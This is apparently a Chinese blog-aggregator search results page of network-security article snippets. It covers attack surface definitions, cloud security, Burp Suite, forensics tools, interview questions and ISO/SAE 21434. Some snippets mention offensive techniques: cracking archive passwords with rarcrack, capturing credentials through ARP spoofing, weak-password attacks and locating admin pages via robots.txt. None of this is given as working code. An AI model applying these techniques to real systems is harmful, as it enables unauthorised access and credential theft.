    暴露面:暴露在攻击者视线范围内,可以被利用进行入侵的系统、设备、信息等,都属于暴露面。大量的暴露面都潜藏在不容易被发现的暗处,很容易因为资产排查不彻底、人员疏漏等问题被忽略

    攻击面:是一个给定的计算机或网络系统,可以被黑客访问和利用的漏洞总和。
    攻击面包含:
    操作系统、中间件、应用程序、承载网络中存在的软件漏洞;
    系统和软件中的错误配置与安全控制缺失;
    违反安全制度和合规要求的网络配置;
    过度宽松的访问控制规则;

    展开全文
  • 网络安全新技术

    千次阅读 2021-09-26 17:47:05
    目录 一、云计算安全 1. 云计算定义 2. 云计算特征 3. 云计算服务形式 4. 云计算平台安全威胁 5. 云计算安全技术体系框架 6. 可信云计算 二、大数据安全 1. 大数据的定义 2. 大数据的特征 3. 大数据安全...
  • 网络安全专业名词解释

    千次阅读 2022-03-04 16:02:18
    Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是...
  • 网络安全--安全攻防概述

    千次阅读 2021-08-18 18:27:21
    1.2网络安全概述 1.3网络攻击: 1.4安全防御 二、信息安全发展历程 2.1信息安全发展简介 2.2信息安全发展历程 三、信息安全职业发展方向 3.1信息安全职业前景 3.2信息安全职业发展方向 课程目标:这节课...
  • 我们发现获取到的密玛是经过加密处理的,这并不奇怪,一般稍大一点的网站,都会对密玛进行加密处理,我们可以通过相关工具进行解密,这里不进行演示,这样就能获取到明文密玛及相关的账号了。 以上就是使用ARP欺骗...
  • 网络安全面试必问

    千次阅读 2022-03-29 22:45:12
    项目经历 ... 大家底子应该都各不相同,在面试中可能会问到你们不懂的知识点,不要慌 可以迂回战术 ,大部分问题应该会围绕 应急 溯源 渗透(近一年比较火的漏洞)来问,也可能会问网络基础的一些东...
  • 电子数据取证技术 1. 易失性信息的提取 易失性是指数据保存的环境如果不能满足某种条件,就确定会...Bginfo:计算机软、硬件信息,包括CPU主频、网络信息、操作系统版本、IP地址、硬盘信息等。 PsloggedOn:本地登录的
  • 4 中英文最全的网络安全术语表 按字母 A-Z 顺序排列,用简单的中英文解释,让你了解到最全的网络安全术语。 4.1 A 4.1.1 高级持久威胁(APT) 一种网络攻击,使用复杂的技术持续对目标政府和公司进行网络间谍活动或...
  • 1.1、Rarcrack是一款获取压缩文件密吗的软件,但是仅支持zip、rar和7z三种类型。 1.2、在kali操作系统中是没有此工具的,所以就必须先安装才能使用。 1.3、安装Rarcrack的指令:apt install rarcrack。 1.4、...
  • 复试-网络安全问答

    千次阅读 2022-04-02 14:09:58
    2022年考研复试时,复习网络安全总结的内容,若有错误,请指出!
  • 网络安全知识点(全)

    千次阅读 2022-04-18 10:41:18
    漏洞类型–分为操作系统漏洞、网络协议漏洞、数据库...网络安全机制–OSI网络安全体系 书本P9 八项 加密机制 数据加密是提供信息保密的主要方法,可以保护数据存储和传输的保密性 数字签名机制 数字签名可解决传统手
  • 计算机网络安全(一)

    千次阅读 多人点赞 2021-09-25 23:07:52
    随着计算机技术和信息技术的不断发展,互联网、通信网、计算机...在计算机网络发展面临重大机遇的同时,网络安全形式也日益严峻,国家政治、经济、文化、社会、国防安全及公民在网络空间的合法权益面临着风险和挑战。
  • ISO/SAE21434网络安全标准解析

    千次阅读 2022-03-16 14:51:50
    ISO/SAE 21434 《道路车辆 网络安全工程》是SAE和ISO共同制定的一项针对道路车辆的网络安全标准,它是一个面向汽车行业全供应链(OEM及各级供应商)的车辆网络安全管理指导文件,其目的是指导行业内相关组织: ...
  • 研判工作要充分利用已有安全设备(需要提前了解客户的网络拓扑以及部署设备情况),分析其近期的设备告警,将全部流量日志(日志条件:源地址,目的地址,端口,事件名称,时间,规则ID,发生 次数等)根据研判标准...
  • 这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了虚拟机VMware+Kali安装入门及Sqlmap基本用法,这篇文章将分享Wireshark安装...
  • 常见网络安全产品汇总,可作初步了解。
  • CTF —— 网络安全大赛

    万次阅读 2021-05-25 17:10:37
    这里写自定义目录标题...⚔科技是一把双刃剑,网络安全不容忽视,人们的隐私在大数据面前暴露无遗,账户被盗、资金损失、网络诈骗、隐私泄露,种种迹象表明,随着互联网的发展,网络安全需要引起人们的重视。 ????互联
  • 计算机网络安全 第一章绪论

    万次阅读 多人点赞 2021-11-21 17:52:15
    1,典型的网络安全威胁 威胁 描述 窃听 网络中传输的敏感信息被窃听 重传 攻击者事先获得部分或全部信息,以后将此信息发送给接收者 伪造 攻击者将伪造的信息发送给接收者 篡改 攻击者对合法用户之间...
  • 这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Python弱口令攻击、自定义字典生成,调用Python的exrex库实现,并结合...
  • 史上最全网络安全面试题汇总 ! !

    千次阅读 2021-08-04 19:26:32
    恶意使用网站功能,如本地图片读取功能读取不存在图片,上传点上传不能正常导入的文件 你常用的渗透工具有哪些,最常用的是哪个? burp、nmap、sqlmap、awvs、蚁剑、冰蝎、dirsearch、御剑等等 xs
  • 2021 年职业院校技能大赛“网络安全”项目 江西省比赛任务书
  • 网络安全应急响应-常用工具

    千次阅读 2022-03-27 19:51:14
    1. Sysinternals Suite ...为了确保创建安全的环境,Windows 管理员通常需要了解特定用户或用户组对文件、目录、注册表项和 Windows 服务等资源具有哪种访问权限。AccessChk 能够通过直观的界面和输出快速回
  • 这里写自定义目录标题写在前面判断题正确单选题错误单选题...F 项目TD是项目网络安全管理的第一责任人,项目组在任命时要明确网络安全管理职责,负责网络安全管理措施在本项目组的执行,组织网络安全现场培训。 F 接
  • 网络安全之基础入门(一)

    千次阅读 多人点赞 2022-02-26 10:59:42
    一旦您的域名被劫持,用户被引到假冒的网站进而无法正常浏览网页,用户可能被诱骗到冒牌网站进行登录等操作导致泄露隐私数据 4.) DNS DDOS攻击 针对DNS的DDoS攻击通过控制大批僵尸网络利用真实DNS协议栈发起大量...
  • 这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、...
  • 获取网站后台权限理解

    千次阅读 2022-03-18 10:45:13
    robots.txt是一种存放于网站目录下的ASCII编码的文本文件,它通常告诉网络搜索引擎,此网站中的哪些内容是不能被搜索引擎获取的,哪些是可以被获取的。管理员们为了让搜索引擎不要收录admin页面而在robots
  • 这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 239,942
精华内容 95,976
关键字:

网络安全 获取网站的目录